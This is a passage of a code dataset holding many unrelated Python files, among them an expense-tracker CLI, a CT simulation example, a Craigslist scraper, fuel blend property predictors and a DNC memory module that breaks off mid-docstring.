XSpectrum1D.from_tuple((modeltab['wavelength'], modeltab['model'],\n modeltab['normsig'], dummycont))\n spec.write_to_fits(outfile)\n","sub_path":"joebvp/stevebvpfit.py","file_name":"stevebvpfit.py","file_ext":"py","file_size_in_byte":34760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"121826620","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Charger is a program for modifying atom symbols in RDF\n# Copyright (C) 2014 Ramil Nugmanov\n# This program is free software: you can redistribute it and/or modify it under\n# the terms of the GNU Affero General Public License as published by the Free\n# Software Foundation, either version 3 of the License, or (at your option) any later version.\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n# You should have received a copy of the GNU Affero General Public License along\n# with this program. If not, see http://www.gnu.org/licenses/.\n\nimport argparse\nimport re\n\n\ndef main():\n rawopts = argparse.ArgumentParser(description=\"simple CLI atom charge data generator\",\n epilog=\"created by stsouko.\")\n rawopts.add_argument(\"--version\", \"-v\", action=\"version\", version=\"0.1\", default=False)\n rawopts.add_argument(\"--input\", \"-i\", type=str, default=\"input.rdf\", help=\"RDF inputfile\")\n rawopts.add_argument(\"--charges\", \"-c\", type=str, default=\"input.chr\", help=\"chargedata inputfile\")\n rawopts.add_argument(\"--output\", \"-o\", type=str, default=\"output.rdf\", help=\"RDF outputfile\")\n rawopts.add_argument(\"--accuracy\", \"-a\", type=float, default=.1, help=\"accuracy\")\n options = vars(rawopts.parse_args())\n\n try:\n out = open(options['output'], 'w')\n except:\n print('error write to file')\n return 0\n try:\n data = open(options['charges'])\n except:\n print('error read file')\n return 0\n data.next()\n charges = []\n for i in data:\n charges += i.strip().split('\\t')[1].split(';')\n data = iter(charges)\n\n accuracy = 1 / options['accuracy']\n for l in open(options['input']):\n if re.search('(\\s+-?[0-9]+\\.[0-9]+){3}\\s+[A-Z][a-z]?(\\s+-?[0-9]+){12}', l):\n l = l[:31] + '%-3d' % (accuracy * (float(data.next().replace(',', '.')) + 5)) + l[34:]\n out.write(l)\n return 0\n\n\nif __name__ == '__main__':\n main()","sub_path":"charger.py","file_name":"charger.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"191611314","text":"from __future__ import print_function, unicode_literals\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom PyInquirer import Validator, ValidationError\n\n\n# terminal coloring and bolding\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\nclass NumberValidator(Validator):\n def validate(self, document):\n try:\n float(document.text)\n except ValueError:\n raise ValidationError(\n message=\"Please enter a dollar amount without the '$'.\",\n cursor_position=len(document.text)) # Move cursor to end\n\n\n# def intro():\n# questions = [\n# {\n# 'type': 'list',\n# 'name': 'action',\n# 'message': 'What do you want to do?',\n# 'choices': [\n# 'Add a new expense',\n# 'View expenses by card',\n# Separator(),\n# 'Edit a current expense',\n# 'Delete a current expense',\n# Separator(),\n# 'View unsubmitted expenses',\n# 'View submitted expenses',\n# 'View expenses by vendor',\n# 'View all expenses',\n# Separator(),\n# 'Mark expenses(s) as submitted',\n# 'Mark expenses(s) as unsubmitted',\n# Separator(),\n# 'Exit',\n# # Separator(),\n# # 'Test 1',\n# ]\n# }\n# ]\n\n\ndef intro():\n questions = [\n {\n 'type': 'list',\n 'name': 'action',\n 'message': 'What do you want to do?',\n 'choices': [\n 'Add a New Expense',\n 'Edit a Current Expense',\n Separator(),\n 'View Expenses',\n 'Delete Expense(s)',\n Separator(),\n 'Insert Test Data', # TODO move to admin interface\n Separator(),\n 'Exit',\n ]\n },\n {\n 'type': 'list',\n 'name': 'view_type',\n 'message': 'What expenses would you like to view?',\n 'choices': [\n 'Current Expenses',\n 'Submitted Expenses',\n 'All Expenses',\n Separator(),\n 'By Card',\n 'By Vendor',\n ],\n 'when': lambda answers: answers['action'] == 'View Expenses',\n },\n ]\n\n answers = prompt(questions)\n\n return answers\n\n\ndef new_expense(cards, vendors):\n questions = [\n {'type': 'input', 'name': 'date', 'message': 'Expense date?'},\n {'type': 'input', 'name': 'description',\n 'message': 'Expense description?'},\n {\n 'type': 'list',\n 'name': 'card',\n 'message': 'Which expense card was used?',\n 'choices': cards\n },\n {\n 'type': 'input',\n 'name': 'new_card',\n 'message': 'New card name?',\n 'when': lambda answers: answers['card'] == 'New Card',\n },\n {\n 'type': 'list',\n 'name': 'vendor',\n 'message': 'Vendor?',\n 'choices': vendors\n },\n {\n 'type': 'input',\n 'name': 'new_vendor',\n 'message': 'New vendor name?',\n 'when': lambda answers: answers['vendor'] == 'New Vendor',\n },\n {\n 'type': 'input',\n 'name': 'amount',\n 'message': 'Amount? (excluding $)',\n 'validate': NumberValidator,\n },\n ]\n\n answers = prompt(questions)\n\n if answers['vendor'] == 'New Vendor':\n answers['vendor'] = answers['new_vendor']\n del answers['new_vendor']\n\n return answers\n\n\ndef select_from_list(l, message):\n questions = [\n {\n 'type': 'list',\n 'name': 'selection',\n 'message': message,\n 'choices': l,\n },\n ]\n\n answers = prompt(questions)\n\n return answers\n\n\ndef vendor_expenses(vendors):\n questions = [\n {\n 'type': 'list',\n 'name': 'vendor',\n 'message': 'Expense vendor?',\n 'choices': vendors\n },\n ]\n\n answers = prompt(questions)\n\n return answers\n\n\ndef card_expenses(cards):\n questions = [\n {\n 'type': 'list',\n 'name': 'card',\n 'message': 'Card?',\n 'choices': cards\n },\n ]\n\n\ndef edit_expense(expenses, cards, vendors):\n\n questions = [\n {\n 'type': 'list',\n 'name': 'expense',\n 'message': 'What expense would you like to edit?',\n 'choices': expenses\n },\n {\n 'type': 'confirm',\n 'message': 'Do you need to update the expense date?',\n 'name': 'update_date',\n 'default': False,\n },\n {\n 'type': 'input',\n 'name': 'date',\n 'message': 'What is the udpated date?',\n 'when': lambda answers: answers['update_date'] == True\n },\n {\n 'type': 'confirm',\n 'message': 'Do you need to update the expense description?',\n 'name': 'update_description',\n 'default': False,\n },\n {\n 'type': 'input',\n 'name': 'description',\n 'message': 'What is the udpated description?',\n 'when': lambda answers: answers['update_description'] == True\n },\n {\n 'type': 'confirm',\n 'message': 'Do you need to update the expense card?',\n 'name': 'update_card',\n 'default': False,\n },\n {\n 'type': 'list',\n 'name': 'card',\n 'message': 'Which is the updated card?',\n 'choices': cards,\n 'when': lambda answers: answers['update_card'] == True\n },\n {\n 'type': 'input',\n 'name': 'new_card',\n 'message': 'New card name?',\n 'when': lambda answers: answers['update_card'] == True and answers['card'] == 'New Card',\n },\n {\n 'type': 'confirm',\n 'message': 'Do you need to update the expense vendor?',\n 'name': 'update_vendor',\n 'default': False,\n },\n {\n 'type': 'list',\n 'name': 'vendor',\n 'message': 'What is the udpated vendor?',\n 'choices': vendors,\n 'when': lambda answers: answers['update_vendor'] == True\n },\n {\n 'type': 'input',\n 'name': 'new_vendor',\n 'message': 'New vendor name?',\n 'when': lambda answers: answers['update_vendor'] == True and answers['vendor'] == 'New Vendor',\n },\n {\n 'type': 'confirm',\n 'message': 'Do you need to update the expense amount?',\n 'name': 'update_amount',\n 'default': False,\n },\n {\n 'type': 'input',\n 'name': 'amount',\n 'message': 'What is the udpated amount (excluding $)?',\n 'when': lambda answers: answers['update_amount'] == True\n },\n ]\n\n answers = prompt(questions)\n\n del answers['update_date']\n del answers['update_description']\n del answers['update_card']\n del answers['update_vendor']\n del answers['update_amount']\n\n return answers\n\n\n# def delete_expense(expenses):\n\n# questions = [\n# {\n# 'type': 'list',\n# 'name': 'expense',\n# 'message': 'What expense would you like to delete?',\n# 'choices': expenses\n# },\n# {\n# 'type': 'confirm',\n# 'message': \"Are you sure you want to delete this expense? THIS ACTION CAN'T BE UNDONE!\",\n# 'name': 'delete',\n# 'default': False,\n# },\n# ]\n\n# answers = prompt(questions)\n\n# return answers\n\n\ndef delete_expenses(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like deleted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n {\n 'type': 'confirm',\n 'message': \"Are you sure you want to delete the selected expense(s)? THIS ACTION CAN'T BE UNDONE!\",\n 'name': 'delete',\n 'default': False,\n },\n ]\n\n answers = prompt(questions)\n\n return answers\n\n\ndef mark_expense_submitted(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like mark as submitted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n # {\n # 'type': 'confirm',\n # 'message': \"Are you sure you want to mark expense(s) as submitted?\",\n # 'name': 'mark',\n # 'default': False,\n # }\n ]\n\n answers = prompt(questions)\n\n if len(answers['expenses']) < 1:\n return False\n else:\n return answers\n\n\ndef mark_expense_unsubmitted(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like mark as unsubmitted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n # {\n # 'type': 'confirm',\n # 'message': \"Are you sure you want to mark expense(s) as unsubmitted?\",\n # 'name': 'mark',\n # 'default': False,\n # }\n ]\n\n answers = prompt(questions)\n\n if len(answers['expenses']) < 1:\n return False\n else:\n return answers\n\n\ndef cont_program():\n questions = [\n {\n 'type': 'confirm',\n 'message': \"Would you like to continue using the program?\",\n 'name': 'cont',\n 'default': True,\n },\n ]\n\n answers = prompt(questions)\n\n if answers['cont']:\n return True\n\n return False\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":10452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10713027","text":"from random import randint\r\n\r\nclass Probability:\r\n\r\n def __init__(self, d, i, t, s):\r\n self.d = d\r\n self.i = i\r\n self.t = t\r\n self.s = s\r\n self.a = []\r\n self.z = []\r\n self.p = []\r\n self.n = self.d / self.s\r\n\r\n def calcTries(self):\r\n for x in range(1, self.i + 1):\r\n while True:\r\n r = randint(1, self.d)\r\n if r == self.d:\r\n print(\"iteration: \" + str(x) + \", tries: \" + str(self.t + 1))\r\n self.z.append(self.t + 1)\r\n self.t = 0\r\n break\r\n else:\r\n self.t += 1\r\n\r\n def calcSplit(self):\r\n for x in range(0, self.s + 1):\r\n self.a.append([])\r\n for i in range(len(self.z)):\r\n for j in range(1, self.s + 1):\r\n m = int(self.n * j)\r\n if self.z[i] < m:\r\n self.a[j - 1].append(self.z[i])\r\n elif self.z[i] > self.d:\r\n self.a[self.s].append(self.z[i])\r\n\r\n def calcPercentages(self):\r\n for i in range(len(self.a)):\r\n self.p.append(len(self.a[i]) / sum(len(x) for x in self.a) * 100)\r\n print(self.p)\r\n\r\ninit = Probability(300, 10, 0, 7)\r\ninit.calcTries()\r\ninit.calcSplit()\r\nprint(init.a)\r\n\r\n# init.calcPercentages()","sub_path":"probability_v2.py","file_name":"probability_v2.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"631421231","text":"# Copyright 2020, General Electric Company. All rights reserved. See https://github.com/xcist/code/blob/master/LICENSE\n\n###------------ import XCIST-CatSim\nimport catsim as xc\n\n\n##--------- Initialize \nct = xc.CatSim(\"Phantom_Sample\", \"Scanner_Sample_generic\", \"Protocol_Sample_axial\") # initialization\n\n##--------- Make changes to parameters (optional)\nct.resultsName = \"test\"\nct.protocol.viewsPerRotation = 50\nct.protocol.viewCount = ct.protocol.viewsPerRotation\nct.protocol.stopViewId = ct.protocol.viewCount-1\n# ct.protocol.scanTypes = [1, 0, 0] # flags for airscan, offset scan, phantom scan\n# ct.load_cfg(\"Protocol_Sample_axial\", \"Physics_Sample\", \"Recon_Sample_2d\") # new cfg overrides existing parameters\n\n##--------- Run simulation\nct.run_all() # run the scans defined by protocol.scanTypes\n\n\n##--------- Show results\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprep = xc.rawread(ct.resultsName+'.prep', [ct.protocol.viewCount, ct.scanner.detectorColCount, ct.scanner.detectorRowCount], 'float')\nprep = prep[-1, :, :]\nplt.plot(prep[:, 7])\nplt.show()\n","sub_path":"examples/Sim_Sample.py","file_name":"Sim_Sample.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"402553719","text":"import os\nimport tempfile\n\nfrom flask import request, jsonify\nimport pytest\n\nfrom noodle import create_app as noodle\n\n@pytest.fixture\ndef client():\n \"\"\" Configure the test client \"\"\"\n client = noodle()\n yield client.test_client()\n\ndef test_create_product(client):\n \"\"\" Create a product \"\"\"\n\n json_input = {\"data\":{\"attributes\":{\"name\":\"Sample product\"},\n \"type\":\"products\"}}\n response = client.post('/api/products', json=json_input)\n json_data = response.get_json()['data']['attributes']['name']\n assert json_data == 'Sample product', 'Product name is returned'\n\ndef test_show_product_list(client):\n \"\"\" Show all products \"\"\"\n\n response = client.get('/api/products')\n json_data = response.get_json()\n assert len(json_data) > 0, 'Return all products in the db'\n\ndef test_create_detail(client):\n \"\"\" Create an detail \"\"\"\n\n json_input = {\"data\":{\"attributes\":{\"name\":\"Sample detail\"},\n \"type\":\"details\"}}\n response = client.post('/api/details', json=json_input)\n json_data = response.get_json()['data']['attributes']['name']\n assert json_data == 'Sample detail', 'detail name is returned'\n\ndef test_show_detail_list(client):\n \"\"\" Show all details \"\"\"\n\n response = client.get('/api/details')\n json_data = response.get_json()\n assert len(json_data) > 0, 'Return all details in the db'\n","sub_path":"noodle-product-manager-server/tests/test_noodle.py","file_name":"test_noodle.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306821418","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom .models import Question\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\nclass DateTimeInput(forms.DateTimeInput):\n input_type = 'datetime'\n\nclass QuestionForm(ModelForm):\n\n class Meta:\n model = Question\n fields = ['question_text', 'pub_date']\n widgets = {\n 'pub_date': DateInput(attrs={'type': 'date'}),\n }","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99143190","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nfrom urlparse import urljoin\nimport dataset\n\ndb = dataset.connect('sqlite:///missed_connections.db')\n\nBASE_URL = 'http://charlotte.craigslist.org'\n\ndef scrape_missed_connections():\n \"\"\" Scrape all the missed connections from a list \"\"\"\n\n response = requests.get(BASE_URL + \"/search/mis?query=w4m\")\n\n soup = BeautifulSoup(response.content)\n\n missed_connections = soup.find_all('span', {'class':'pl'})\n\n for x in missed_connections:\n\n link = x.find('a').attrs['href']\n\n url = urljoin(BASE_URL, link)\n\n scrape_missed_connection(url)\n\ndef scrape_missed_connection(url):\n \"\"\" Extract information from a missed connections's page. \"\"\"\n\n response = requests.get(url)\n\n soup = BeautifulSoup(response.content)\n\n data = {\n 'source_url': url,\n 'subject': soup.find('h2', {'class':'postingtitle'}).text.strip(),\n 'body': soup.find('section', {'id':'postingbody'}).text.strip(),\n 'datetime': soup.find('time').attrs['datetime']\n }\n\n pprint(data)\n db['posts'].upsert(data, ['source_url'])\n\nif __name__ == '__main__':\n scrape_missed_connections()\n","sub_path":"missed_connections.py","file_name":"missed_connections.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427177688","text":"import requests\nimport json\nimport pandas as pd\nfrom multiprocessing import pool\n\nerror_id = []\n\nBASE_URL = 'http://127.0.0.1:5001/api/query/business_poly/?poly={geom}'\npath = r'E:\\project\\request\\test.xlsx'\ngeoms = pd.read_excel(path) # 读取geom信息\n\n\ndef get_data(geoms, dataframe):\n for index, row in geoms.iterrows():\n url = BASE_URL.format(geom=row['geom'])\n r = requests.get(url)\n print('正在处理{}'.format(row['shangquan_id']))\n if r.status_code == 200:\n c = json.loads(r.text)\n c['data']['city'] = row['city']\n c['data']['shangquan_id'] = row['shangquan_id']\n dataframe = dataframe.append(c['data'], ignore_index=True)\n else:\n error_id.append(row['shangquan_id'])\n\n dataframe.to_excel(\"test.xlsx\")\n print(error_id)\n\n\nif __name__ == '__main__':\n d = pd.DataFrame(columns=['city', 'shangquan_id', 'biz_mature_score', 'residencial_score', 'food_competing_score',\n 'cloth_competing_score', 'child_competing_score',\n 'service_competing_score', 'entertainment_competing_score',\n 'transportation_score', 'cluster_score', 'spending_score'])\n geoms = pd.read_excel(path)\n get_data(geoms, d)\n","sub_path":"request/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558729961","text":"\nclass interface:\n def Menu(self, obj):\n\n obj.viewComposer()\n\n print('Composers which have songs = 4 minutes')\n obj.searchComposer()\n\n print('if you want to add composer 1')\n print('if you want to change composer or songs 2')\n print('if you want to delete composer 3')\n print('if you want to add song 4')\n buf=input()\n if buf==1:\n print('Enter name of composer')\n name=raw_input()\n print('Enter age of composer')\n age=input()\n obj.newComposer(name, age)\n elif buf==2:\n obj.changeComposer()\n elif buf==3:\n print('Enter name of composer')\n name_composer=raw_input()\n obj.delComposers(name_composer)\n elif buf==4:\n name_c = raw_input('Enter name of composer')\n name = raw_input('Enter name of song')\n ganre = raw_input('Enter ganre ')\n time = input('Enter time')\n obj.newSong(name_c, name, ganre, time)\n elif buf==5 :\n return(0)\n return(1)\n","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"209511879","text":"import tensorflow as tf\nimport os\nimport shutil\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python import ops\nfrom tensorflow.tools.graph_transforms import TransformGraph\n\n\ndef get_graph_def_from_file(graph_filepath):\n tf.reset_default_graph()\n with ops.Graph().as_default():\n with tf.gfile.GFile(graph_filepath, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n return graph_def\n\n\ndef convert_graph_def_to_saved_model(export_dir, graph_filepath, input_name, outputs):\n graph_def = get_graph_def_from_file(graph_filepath)\n with tf.Session(graph=tf.Graph()) as session:\n tf.import_graph_def(graph_def, name='')\n tf.compat.v1.saved_model.simple_save(\n session,\n export_dir,# change input_image to node.name if you know the name\n inputs={input_name: session.graph.get_tensor_by_name('{}:0'.format(node.name))\n for node in graph_def.node if node.op=='Placeholder'},\n outputs={t.rstrip(\":0\"):session.graph.get_tensor_by_name(t) for t in outputs}\n )\n print('Optimized graph converted to SavedModel!')\n\ntf.compat.v1.enable_eager_execution()\n\n# Look up the name of the placeholder for the input node\ngraph_def=get_graph_def_from_file('./frozen_inference_graph.pb')\ninput_name=\"\"\nfor node in graph_def.node:\n if node.op=='Placeholder':\n print(\"##### frozen_inference_graph - Input Node Name #####\", node.name) # this will be the input node\n input_name=node.name\n\n# mobilenetv2_fsd2018_41cls output names\noutputs = ['raw_outputs/box_encodings:0','raw_outputs/class_predictions:0']\n\n# convert this to a TF Serving compatible mode - mobilenetv2_fsd2018_41cls\nshutil.rmtree('./saved_model', ignore_errors=True)\nconvert_graph_def_to_saved_model('./saved_model', './tflite_graph.pb', input_name, outputs)\n","sub_path":"002_mobilenetv3-ssd/02_mobilenetv3_large/01_coco/01_float/01_freeze_the_saved_model_v1.py","file_name":"01_freeze_the_saved_model_v1.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449827928","text":"import sys\ninput = sys.stdin.readline\n\n\nn, k = map(int, input().split())\nf = list(map(int, input().split()))\nfreq = {}\nl, c = 0, 0\nfor r in range(n):\n if f[r] not in freq:\n freq[f[r]] = 0\n freq[f[r]] += 1\n while len(freq) >= k:\n l += 1\n freq[f[l - 1]] -= 1\n if not freq[f[l - 1]]:\n del freq[f[l - 1]]\n c += l\nprint(c)\n","sub_path":"DMOJ/Other (APIO, COCI DWITE, ect.)/Smarties.py","file_name":"Smarties.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"247795582","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# ecpredict/blend_predict.py\n# v.0.1.4\n# Developed in 2020 by Travis Kessler \n#\n# Contains function for predicting properties of multi-component blends\n#\n\nfrom math import sqrt\n\nfrom ecpredict.utils.loc_errors import TEST_MED_ABS_ERRORS\nfrom ecpredict.utils.project import get_prj\nfrom ecpredict.predict import lower_heating_value\nfrom ecpredict.utils.equations import _celsius_to_rankine, _linear_blend_ave,\\\n _linear_blend_err, _linear_blend_err_multi, _rankine_to_celsius\n\nfrom padelpy import from_smiles\n\n\ndef cetane_number_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('CN', backend)\n cn_values = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n cn_values.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n cn_values.append(item)\n omit.append(True)\n return (_linear_blend_ave(cn_values, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['CN_{}'.format(backend)],\n proportions, omit))\n\n\ndef cloud_point_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('CP', backend)\n cp_values = []\n for item in smiles_and_vals:\n if type(item) is str:\n cp_values.append(_celsius_to_rankine(\n trained_prj.use([item], backend)[0]\n ))\n else:\n cp_values.append(_celsius_to_rankine(item))\n cp_sum = 0\n for idx, val in enumerate(cp_values):\n cp_sum += (proportions[idx] * val**13.45)\n return _rankine_to_celsius(cp_sum**(1 / 13.45))\n\n\ndef lower_heating_value_blend(smiles_and_vals: tuple,\n proportions: tuple) -> tuple:\n\n vals = []\n errors = []\n omit = []\n for smi in smiles_and_vals:\n if type(smi) is str:\n v, e = lower_heating_value([smi])\n vals.append(v[0])\n errors.append(e[0])\n omit.append(False)\n else:\n vals.append(smi)\n errors.append(0)\n omit.append(True)\n res_val = _linear_blend_ave(vals, proportions)\n res_error = _linear_blend_err_multi(errors, proportions, omit)\n return (res_val, res_error)\n\n\ndef kinematic_viscosity_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('KV', backend)\n kv_vals = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n kv_vals.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n kv_vals.append(item)\n omit.append(True)\n return (_linear_blend_ave(kv_vals, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['KV_{}'.format(backend)],\n proportions, omit))\n\n\ndef yield_sooting_index_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('YSI', backend)\n ysi_values = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n ysi_values.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n ysi_values.append(item)\n omit.append(True)\n return (_linear_blend_ave(ysi_values, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['YSI_{}'.format(backend)],\n proportions, omit))\n","sub_path":"ecpredict/blend_predict.py","file_name":"blend_predict.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"315800025","text":"import os\n\nfrom subprocess import Popen\n# taken from:\n# http://www.swag.dk/pub/djangobook-pdf/\n# needs pdftk and htmldoc installed\n\npdfs = []\n\nfor i in xrange(1, 21):\n p = Popen(['htmldoc', '--webpage', '-f', '%d.pdf' % i, \n 'http://www.djangobook.com/en/2.0/chapter%02d/' % i])\n p.wait()\n\n if p.returncode == 0:\n if os.path.exists('%d.pdf' % i):\n pdfs.append('%d.pdf' % i)\n\nif len(pdfs) > 0:\n cmds = ['pdftk']\n cmds.extend(pdfs)\n cmds.extend(['cat', 'output', 'djangobook_all.pdf'])\n p = Popen(cmds)\n p.wait()\n","sub_path":"djangobookgen.py","file_name":"djangobookgen.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"136464523","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport generators as gen\nfrom torch.utils.data import DataLoader\nfrom utils import *\n\n\neps = 10e-6\n\n\nclass Controller(nn.Module):\n def __init__(self,\n batch_size=32,\n num_reads=2,\n num_layers=2,\n input_size=None,\n word_size=4,\n output_size=24,\n hidden_size=250):\n super(Controller, self).__init__()\n self.num_layers = num_layers\n self.batch_size = batch_size\n self.num_hidden = hidden_size\n if input_size is not None:\n self._insize = input_size\n else:\n self._insize = word_size + word_size * num_reads\n #state\n # print(\"controller {}, {}, {} -> out:{}\".format(\n # word_size, hidden_size, num_layers, output_size))\n self.lst1 = nn.LSTM(input_size=self._insize, #word_size,\n hidden_size=hidden_size,\n num_layers=num_layers,\n batch_first=True)\n\n self.lst2 = nn.LSTM(input_size=hidden_size, #word_size,\n hidden_size=output_size,\n num_layers=1,\n batch_first=True)\n self.map_to_output = nn.Linear(hidden_size, output_size)\n # print(\"lstm\", self.lst1)\n # self.interface_weights = Variable(torch.FloatTensor(output_size - word_size, batch_size).uniform_(0, 1))\n # self.read_weights = Variable(torch.FloatTensor(word_size, batch_size).uniform_(0, 1))\n\n def forward(self, inputs, previous_controller_state):\n \"\"\"Generate interface and output vector\n \"\"\"\n h1, h2 = previous_controller_state\n print(inputs.size(), h1.size(), h2.size())\n inputs = inputs.unsqueeze(1)\n lstm_out, controller_state = self.lst1(inputs, previous_controller_state)\n\n outputs = self.map_to_output(lstm_out).squeeze(1)\n\n #read_outputs = outputs.matmul(self.read_weights)\n #interface = outputs.matmul(self.interface_weights)\n\n #print(\"read_outputs\", read_outputs.size())\n #print(\"interface\", interface.size())\n return outputs, controller_state\n\n\n\nclass Usage(nn.Module):\n def __init__(self, memory_size=100):\n super(Usage, self).__init__()\n self._memory_size = memory_size\n\n\n def _usage_after_write(self, prev_usage, write_weights):\n \"\"\"Calcualtes the new usage after writing to memory.\n\n Args:\n prev_usage: tensor of shape `[batch_size, memory_size]`.\n write_weights: tensor of shape `[batch_size, num_writes, memory_size]`.\n\n Returns:\n New usage, a tensor of shape `[batch_size, memory_size]`.\n \"\"\"\n # Calculate the aggregated effect of all write heads\n write_weights = 1 - (1 - write_weights).prod(1)\n return prev_usage + (1 - prev_usage) * write_weights\n\n def _usage_after_read(self, prev_usage, free_gate, read_weights):\n \"\"\"Calcualtes the new usage after reading and freeing from memory.\n\n Args:\n prev_usage: tensor of shape `[batch_size, memory_size]`.\n\n free_gate: tensor of shape `[batch_size, num_reads]`\n\n with entries in therange [0, 1] indicating the amount that locations\n read from can be freed.\n read_weights: tensor of shape `[batch_size, num_reads, memory_size]`.\n\n Returns:\n New usage, a tensor of shape `[batch_size, memory_size]`.\n \"\"\"\n\n free_gate = free_gate.unsqueeze(-1)\n free_read_weights = 1 - free_gate * read_weights\n phi = free_read_weights.prod(1)\n return prev_usage * phi\n\n def forward(self, write_weights, free_gate, read_weights, prev_usage):\n \"\"\"\n Args:\n write_weights: tensor of shape `[batch_size, num_writes, memory_size]`\n giving write weights at previous time step.\n free_gate: tensor of shape `[batch_size, num_reads]` which indicates\n which read heads read memory that can now be freed.\n read_weights: tensor of shape `[batch_size, num_reads, memory_size]`\n giving read weights at previous time step.\n prev_usage: tensor of shape `[batch_size, memory_size]` giving\n usage u_{t - 1} at the previous time step, with entries in range\n [0, 1].\n\n Return tensor of shape `[batch_size, memory_size]`\n \"\"\"\n write_weights = write_weights.detach()\n usage = self._usage_after_write(prev_usage, write_weights)\n usage = self._usage_after_read(usage, free_gate, read_weights)\n return usage\n\nclass Linkage(nn.Module):\n def __init__(self, memory_size=100, num_writes=1):\n super(Linkage, self).__init__()\n self._memory_size = memory_size\n self._num_writes = num_writes # todo\n\n def _precedence_weights(self, prev_precedence_weights, write_weights):\n \"\"\"Calculates the new precedence weights given the current write weights.\n\n The precedence weights are the \"aggregated write weights\" for each write\n head, where write weights with sum close to zero will leave the precedence\n weights unchanged, but with sum close to one will replace the precedence\n weights.\n\n Args:\n prev_precedence_weights: A tensor of shape `[batch_size, num_writes,\n memory_size]` containing the previous precedence weights.\n write_weights: A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the new write weights.\n\n Returns:\n A tensor of shape `[batch_size, num_writes, memory_size]` containing the\n new precedence weights.\n \"\"\"\n write_sum = write_weights.sum(2, keepdim=True)\n return (1 - write_sum) * prev_precedence_weights + write_weights\n\n def _link(self, prev_link, prev_precedence_weights, write_weights):\n \"\"\"Calculates the new link graphs.\n\n For each write head, the link is a directed graph (represented by a matrix\n with entries in range [0, 1]) whose vertices 